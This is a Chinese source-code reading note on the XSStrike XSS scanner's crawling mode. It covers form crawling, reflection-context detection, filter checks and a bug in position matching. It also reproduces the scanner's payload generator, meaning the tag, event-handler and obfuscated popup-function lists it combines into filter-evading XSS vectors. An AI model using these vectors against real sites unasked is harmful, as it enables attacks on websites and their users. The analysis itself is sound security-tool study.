XSStrike 源码阅读笔记(一)—

XSStrike 可能是目前开源项目中最先进的 XSS 扫描器，阅读这样一个优秀的项目，在XSS自动化检测方法和项目开发方面都能让我们汲取许多宝贵的经验。

XSStrike 简介

XSStrike 主要针对反射型XSS和DOM XSS。它没有使用自动化浏览器，而是全部通过 requests库进行请求。这意味着它无法测试 js 渲染的网页，而对于DOM XSS的分析，则是完全通过语义分析完成的。

XSStrike 主要分为Scan模式(对给定URL直接进行测试)、Crawling模式Fuzz模式和Bruteforcer模式，配合一些其他的辅助功能，可以很好的完成XSS的扫描。

其中，Crawling 模式用来从目标页面中爬取链接，并对这些链接进行测试。这个模式包括了 XSStrike 的所有核心功能，所以我选择这部分作为首先分析的部分。

爬取测试链接

这部分的功能写在core/photon.py。约定的返回内容是一个form的列表。为了方便描述，我把用Golang结构体描述form的形式(静态类型真香)：

type form struct {
	action Url
   	method string
    inputs httpParams
}

对于一个给定的target，首先分析将target本身处理成form的格式：

def rec(target):
    ... ...
    url = getUrl(target, True)
    params = getParams(target, '', True)
    if '=' in target:  # if there's a = in the url, there should be GET parameters
        inps = []
        for name, value in params.items():
            inps.append({'name': name, 'value': value})
        forms.append({0: {'action': url, 'method': 'get', 'inputs': inps}})

随后爬取target的页面内容，分析其中的<form>标签，获取表单的内容：

response = requester(url, params, headers, True, delay, timeout).text
forms.append(zetanize(response))

def zetanize(response):
 	... ...
    forms = {}
    matches = re.findall(r'(?i)(?s)<form.*?</form.*?>',
                         response)  # extract all the forms
    num = 0
    for match in matches:  # everything else is self explanatory if you know regex
        page = re.search(r'(?i)action=[\'"](.*?)[\'"]', match)
        method = re.search(r'(?i)method=[\'"](.*?)[\'"]', match)
        forms[num] = {}
        forms[num]['action'] = d(e(page.group(1))) if page else ''
        forms[num]['method'] = d(
            e(method.group(1)).lower()) if method else 'get'
        forms[num]['inputs'] = []
        inputs = re.findall(r'(?i)(?s)<input.*?>', response)
        for inp in inputs:
            inpName = re.search(r'(?i)name=[\'"](.*?)[\'"]', inp)
            if inpName:
                inpType = re.search(r'(?i)type=[\'"](.*?)[\'"]', inp)
                inpValue = re.search(r'(?i)value=[\'"](.*?)[\'"]', inp)
                inpName = d(e(inpName.group(1)))
                inpType = d(e(inpType.group(1)))if inpType else ''
                inpValue = d(e(inpValue.group(1))) if inpValue else ''
                if inpType.lower() == 'submit' and inpValue == '':
                    inpValue = 'Submit Query'
                inpDict = {
                    'name': inpName,
                    'type': inpType,
                    'value': inpValue
                }
                forms[num]['inputs'].append(inpDict)
        num += 1
    return forms

注意这里用来提取<form>标签属性的正则表达式：以r'(?i)action=[\'"](.*?)[\'"]'为例，只能匹配action="xxxx"或action='xxxx'这种形式。然而实际上，存在属性值两边没有引号的情况。这时就无法正确处理了，是一个有待改进的地方。

之后，匹配页面内容中<a>标签，将过滤掉静态文件类型后缀后的链接送回到rec函数来爬取下一层目标。（这部分的正则也同样存在上述问题）

matches = re.findall(r'<[aA].*href=["\']{0,1}(.*?)["\']', response)
 for link in matches:  # iterate over the matches
            # remove everything after a "#" to deal with in-page anchors
            link = link.split('#')[0]
            if link.endswith(('.pdf', '.png', '.jpg', '.jpeg', '.xls', '.xml', '.docx', '.doc')):
                pass
            else:
                ... ...

就这样，要测试的链接就被爬取完成了。

PS：上面用到的提取页面测试链接和分析<form>的功能,作者都已经单独提取出来作为独立的 Python 的库：Photon、Zetanize

进行测试

这部分内容写在modes/crawl.py，主要的逻辑是：

先遍历参数，寻找并记录输出点和输出点的语境
根据语境，选择可能造成 XSS 的特殊字符，并检查是否被过滤
生成payload

寻找输出点

遍历目标的每个参数，将参数值设定为一个特殊字符串然后发送请求。

def crawl(scheme, host, main_url, form, blindXSS, blindPayload, headers, delay, timeout, encoding):
    if form:
        for each in form.values():
            url = each['action']
            if url:
				... ...
                if url not in core.config.globalVariables['checkedForms']:
                    core.config.globalVariables['checkedForms'][url] = []
                method = each['method']
                GET = True if method == 'get' else False
                inputs = each['inputs']
                paramData = {}
                for one in inputs:
                    paramData[one['name']] = one['value']
                    for paramName in paramData.keys():
                        if paramName not in core.config.globalVariables['checkedForms'][url]:
                            core.config.globalVariables['checkedForms'][url].append(paramName)
                            paramsCopy = copy.deepcopy(paramData)
                            paramsCopy[paramName] = xsschecker
                            response = requester(url, paramsCopy, headers, GET, delay, timeout)

将response送入htmlParser进行分析，通过设置的特殊字符串，计算输出点的个数，删除空白注释(记住这个操作)：

 occurences = htmlParser(response, encoding)

if vectors:
    for confidence, vects in vectors.items():
        try:
            payload = list(vects)[0]
            logger.vuln('Vulnerable webpage: %s%s%s' %
                        (green, url, end))
            logger.vuln('Vector for %s%s%s: %s' %
                        (green, paramName, end, payload))
            break
            except IndexError:
                passdef htmlParser(response, encoding):
    rawResponse = response  # raw response returned by requests
    response = response.text  # response content
    if encoding:  # if the user has specified an encoding, encode the probe in that
        response = response.replace(encoding(xsschecker), xsschecker)
    reflections = response.count(xsschecker)
    position_and_context = {}
    environment_details = {}
    clean_response = re.sub(r'<!--[.\s\S]*?-->', '', response)

首先查找<script></script>中的输出点,并检查输出点是在否在引号内包裹：

script_checkable = clean_response
for script in extractScripts(script_checkable):
    occurences = re.finditer(r'(%s.*?)$' % xsschecker, script)
    if occurences:
        for occurence in occurences:
            thisPosition = occurence.start(1)
            position_and_context[thisPosition] = 'script'
            environment_details[thisPosition] = {}
            environment_details[thisPosition]['details'] = {'quote' : ''}
            for i in range(len(occurence.group())):
                currentChar = occurence.group()[i]
                if currentChar in ('/', '\'', '`', '"') and not escaped(i, occurence.group()):
                    environment_details[thisPosition]['details']['quote'] = currentChar
                elif currentChar in (')', ']', '}', '}') and not escaped(i, occurence.group()):
                    break
            script_checkable = script_checkable.replace(xsschecker, '', 1)

然后查找标签内部的输出点，并分析输出位置是属性名、属性值还是flag：

if len(position_and_context) < reflections:
    attribute_context = re.finditer(r'<[^>]*?(%s)[^>]*?>' % xsschecker, clean_response)
    for occurence in attribute_context:
        match = occurence.group(0)
        thisPosition = occurence.start(1)
        parts = re.split(r'\s', match)
        tag = parts[0][1:]
        for part in parts:
            if xsschecker in part:
                Type, quote, name, value = '', '', '', ''
                if '=' in part:
                    quote = re.search(r'=([\'`"])?', part).group(1)
                    name_and_value = part.split('=')[0], '='.join(part.split('=')[1:])
                    if xsschecker == name_and_value[0]:
                        Type = 'name'
                    else:
                        Type = 'value'
                    name = name_and_value[0]
                    value = name_and_value[1].rstrip('>').rstrip(quote).lstrip(quote)
                else:
                    Type = 'flag'
                position_and_context[thisPosition] = 'attribute'
                environment_details[thisPosition] = {}
                environment_details[thisPosition]['details'] = {'tag' : tag, 'type' : Type, 'quote' : quote, 'value' : value, 'name' : name}

最后查找输出在标签外和注释符号内的输出点：

if len(position_and_context) < reflections:
    html_context = re.finditer(xsschecker, clean_response)
    for occurence in html_context:
        thisPosition = occurence.start()
        if thisPosition not in position_and_context:
            position_and_context[occurence.start()] = 'html'
            environment_details[thisPosition] = {}
            environment_details[thisPosition]['details'] = {}
if len(position_and_context) < reflections:
    comment_context = re.finditer(r'<!--[\s\S]*?(%s)[\s\S]*?-->' % xsschecker, response)
    for occurence in comment_context:
        thisPosition = occurence.start(1)
        position_and_context[thisPosition] = 'comment'
        environment_details[thisPosition] = {}
        environment_details[thisPosition]['details'] = {}

这部分同样有几个问题：

和上面说的一样，属性值两边不一定有引号
thisPosition的参考对象发生了变化

可以看到，输出点在<script>标签内的情况下，thisPositon是输出点在<script>标签内字符串的位置；而输出点在标签内部的情况下，thisPosition是输出点在clean_response这个字符串的位置。这就可能导致thisPosition重复，导致position_and_context和environment_details中的记录被覆盖，同样也导致在计算标签外的输出点时，<script>包裹的输出点被重复计算。可能导致注释内的输出点被忽略，以及性能上的浪费

当然，并不是所有输出点都是可以直接利用的，所以接下来还要标记一些包裹在特殊标签（badTag）内的输出点，：

bad_contexts = re.finditer(r'(?s)(?i)<(style|template|textarea|title|noembed|noscript)>[.\s\S]*(%s)[.\s\S]*</\1>' % xsschecker, response)
non_executable_contexts = []
for each in bad_contexts:
    non_executable_contexts.append([each.start(), each.end(), each.group(1)])

if non_executable_contexts:
    for key in database.keys():
        position = database[key]['position']
        badTag = isBadContext(position, non_executable_contexts)
        if badTag:
            database[key]['details']['badTag'] = badTag
        else:
            database[key]['details']['badTag'] = ''

最后的database就是包括了我们需要的所有输出点信息的字典。

检查输出点的过滤情况

我们之前已经获取到了各个输出点的语境，详细到包括是否在<script>标签包裹内、是否在标签内、是属性名还是属性值、是否在单双引号、反引号的包裹内。那么按照我们正常的 XSS 挖掘思路，接下来肯定要具体分析各个语境的输出点能否逃逸出来，造成XSS。

这部分的功能就是通过filterChecker完成的

efficiencies = filterChecker(url, paramsCopy, headers, GET, delay, occurences, timeout, encoding)

首先根据语境，选择逃逸需要的符号

def filterChecker(url, params, headers, GET, delay, occurences, timeout, encoding):
    positions = occurences.keys()
    sortedEfficiencies = {}
    # adding < > to environments anyway because they can be used in all contexts
    environments = set(['<', '>'])
    for i in range(len(positions)):
        sortedEfficiencies[i] = {}
    for i in occurences:
        occurences[i]['score'] = {}
        context = occurences[i]['context']
        if context == 'comment':
            environments.add('-->')
        elif context == 'script':
            environments.add(occurences[i]['details']['quote'])
            environments.add('</scRipT/>')
        elif context == 'attribute':
            if occurences[i]['details']['type'] == 'value':
                if occurences[i]['details']['name'] == 'srcdoc':  # srcdoc attribute accepts html data with html entity encoding
                    environments.add('&lt;')  # so let's add the html entity
                    environments.add('&gt;')  # encoded versions of < and >
            if occurences[i]['details']['quote']:
                environments.add(occurences[i]['details']['quote'])

然后送入checker检测这些字符有没有被过滤

for environment in environments:
        if environment:
            efficiencies = checker(url, params, headers, GET, delay, environment, positions, timeout, encoding)
            efficiencies.extend([0] * (len(occurences) - len(efficiencies)))
            for occurence, efficiency in zip(occurences, efficiencies):
                occurences[occurence]['score'][environment] = efficiency
    return occurences

我们这里先自己思考一下checker应该做些什么，自然就是将各个特殊字符作为参数值发送请求，查看response里是否存在未转义的输出。为了方便我们定位输出点，我们需要在被测试的特殊字符前后包裹上特殊的标记。

看起来是一个很简单的逻辑，然而在checker的实际实现却是令人困惑的，并且缺存在一个很致命的BUG。

我们先关注checker的返回值list(filter(None, efficiencies))，可以看到返回的内容是特殊字符未被过滤的可能性的列表，这其中还过滤掉了概率为0的结果。

那么结合filterChecker对checker返回值处理部分的代码看，最重要的就是将list(filter(None, efficiencies))里面的内容正确对应到输出点：

 for occurence, efficiency in zip(occurences, efficiencies):
                occurences[occurence]['score'][environment] = efficiency

然而要实现这个对应会面临一些问题，比如在我们的测试字符被拦截导致整个输出点失效（而不单是测试字符被过滤），这就会导致输出点少了一个，计算的efficiency自然也会少一个，这时如果直接返回，输出点和efficiency的对应关系就会错乱。而为了解决这个问题，就有了fileHoles这个函数：

def fillHoles(original, new):
    filler = 0
    filled = []
    for x, y in zip(original, new):
        if int(x) == (y + filler):
            filled.append(y)
        else:
            filled.extend([0, y])
            filler += (int(x) - y)
    return filled

def checker(url, params, headers, GET, delay, payload, positions, timeout, encoding):
    checkString = 'st4r7s' + payload + '3nd'
    response = requester(url, replaceValue(params, xsschecker, checkString, copy.deepcopy), headers, GET, delay, timeout).text.lower()
    reflectedPositions = []
    for match in re.finditer('st4r7s', response):
        reflectedPositions.append(match.start())
    filledPositions = fillHoles(positions, reflectedPositions)

可以看到，为了解决这个问题，fileHoles接受了原有的输出点的位置作为参数，和新得到的输出点参数一一对比，如果newPosition<oldPosition，就说明这个新的输出点前面缺少了一个输出点，那么就用0来补齐。

但是这里出现了一个致命问题：和之前说的问题类似，就是position的相对值的参考对象的问题。我们的oldPosition都是输出点在clean_response(去除了空白注释的response),而newPosition则是在response中的位置，这就导致几乎所有的oldPosition都大于newPosition。当然要解决这里不只是去除空白注释这么简单，还有很多因素会影响这个position，这里就不细说了。

我们继续往下看

num = 0
    efficiencies = []
    for position in filledPositions:
        allEfficiencies = []
        try:
            reflected = response[reflectedPositions[num]
                :reflectedPositions[num]+len(checkString)]
            efficiency = fuzz.partial_ratio(reflected, checkString.lower())
            allEfficiencies.append(efficiency)
        except IndexError:
            pass
        if position:
            reflected = response[position:position+len(checkString)]
            if encoding:
                checkString = encoding(checkString.lower())
            efficiency = fuzz.partial_ratio(reflected, checkString)
            if reflected[:-2] == ('\\%s' % checkString.replace('st4r7s', '').replace('3nd', '')):
                efficiency = 90
            allEfficiencies.append(efficiency)
            efficiencies.append(max(allEfficiencies))
        else:
            efficiencies.append(0)
        num += 1
    return list(filter(None, efficiencies))

重点就是最后一行，这里return的时候无差别直接过滤掉了空值… 结合上面说的问题，这就导致了一个致命的结果：在filterChecker中，最后将输出点和efficiency的对应的时候，对应关系出现了混乱，原本不能逃逸的输出点，被误认为可以逃逸。

这里的前因后果跨越比较大，光这么看可能不能理解，我这里提供一个DEMO，可以用来验证这个BUG。

生成Payload

抛开上面说的问题，我们先继续往下看。我们现在有了各个输出点，并且知道了输出点逃逸所需要的字符是否被过滤，那么自然就可以生成Payload了。

 vectors = generator(occurences, response.text)

这部分的思路比较简单，就不分析全部代码了，仅以输出内容在标签外为例

 vectors = generator(occurences, response.text)

def generator(occurences, response):
        scripts = extractScripts(response)
        index = 0
        vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
        for i in occurences:
            context = occurences[i]['context']
            if context == 'html':
                lessBracketEfficiency = occurences[i]['score']['<']
                greatBracketEfficiency = occurences[i]['score']['>']
                ends = ['//']
                badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''
                if greatBracketEfficiency == 100:
                    ends.append('>')
                if lessBracketEfficiency:
                    payloads = genGen(fillings, eFillings, lFillings,
                                      eventHandlers, tags, functions, ends, badTag)
                    for payload in payloads:
                        vectors[10].add(payload)
            elif context == 'attribute':
                    ... ...
            elif context == 'comment':
                    ... ...
            elif context == 'script':
                    ... ...
        return vectors

重点关注genGen，这才是真正组合出Payload的函数，它接收下列的全局变量，结合该输出点要逃逸所必须的字符，拼接出Payload：

tags = ('html', 'd3v', 'a', 'details')  # HTML Tags

# "Things" that can be used between js functions and breakers e.g. '};alert()//
jFillings = (';')
# "Things" that can be used before > e.g. <tag attr=value%0dx>
lFillings = ('', '%0dx')
# "Things" to use between event handler and = or between function and =
eFillings = ('%09', '%0a', '%0d',  '+')
fillings = ('%09', '%0a', '%0d', '/+/')  # "Things" to use instead of space

eventHandlers = {  # Event handlers and the tags compatible with them
    'ontoggle': ['details'],
    'onpointerenter': ['d3v', 'details', 'html', 'a'],
    'onmouseover': ['a', 'html', 'd3v']
}

functions = (  # JavaScript functions to get a popup
    '[8].find(confirm)', 'confirm()',
    '(confirm)()', 'co\u006efir\u006d()',
    '(prompt)``', 'a=prompt,a()')

def genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, badTag=None):
    vectors = []
    r = randomUpper  # randomUpper randomly converts chars of a string to uppercase
    for tag in tags:
        if tag == 'd3v' or tag == 'a':
            bait = xsschecker
        else:
            bait = ''
        for eventHandler in eventHandlers:
            # if the tag is compatible with the event handler
            if tag in eventHandlers[eventHandler]:
                for function in functions:
                    for filling in fillings:
                        for eFilling in eFillings:
                            for lFilling in lFillings:
                                for end in ends:
                                    if tag == 'd3v' or tag == 'a':
                                        if '>' in ends:
                                            end = '>'  # we can't use // as > with "a" or "d3v" tag
                                    breaker = ''
                                    if badTag:
                                        breaker = '</' + r(badTag) + '>'
                                    vector = breaker + '<' + r(tag) + filling + r(
                                        eventHandler) + eFilling + '=' + eFilling + function + lFilling + end + bait
                                    vectors.append(vector)
    return vectors

这里重点说两个值得注意的地方，一个是badTag的处理，另一个是vectors的结构，他把Payload的等级由高到低划分为11个等级，越高级的Payload攻击效果越好(如不需要用户交互的Payload等级高)。最后输出结果的时候，自然也是优先输出等级高的Payload：

if vectors:
    for confidence, vects in vectors.items():
        try:
            payload = list(vects)[0]
            logger.vuln('Vulnerable webpage: %s%s%s' %
                        (green, url, end))
            logger.vuln('Vector for %s%s%s: %s' %
                        (green, paramName, end, payload))
            break
            except IndexError:
                pass

总结

写到这里Crawling模式就基本分析完了，整个XSStrike扫描挖掘漏洞的原理部分也就讲清楚了。剩下的就是其他模式的功能，以及一些其他辅助性模块(如WafDetect)的实现了，后面再慢慢讲。

可以看到 XSStrike 检测XSS的原理其实还是很简单的，可以说就是将我们正常手动挖掘XSS漏洞的过程转换成代码，相比其他扫描器花里胡哨的实现，更简单，却也更有效～（再吐槽一句，XSStrike 的代码质量是真的高，项目结构清楚，代码简介清晰，比某些项目的代码质量高不知道多少倍…）

不过也可以看到，XSStrike 还是存在一些BUG和有待优化的地方的，当然这些问题也是业界难题，我想了很久也没有想到用来替代fileHoles的有效方案，期待有想法的朋友们一起探讨。

PS：写到最后发现自己还是不太擅长写技术类文章，更不擅长写源码笔记这种文章，总想着自己用语言去描述自己的理解，却又感觉描述不清楚，反而搞得很啰嗦。还是要多练练吧～

Li4n0's NoteBook

XSStrike 源码阅读笔记(一)——Crawling模式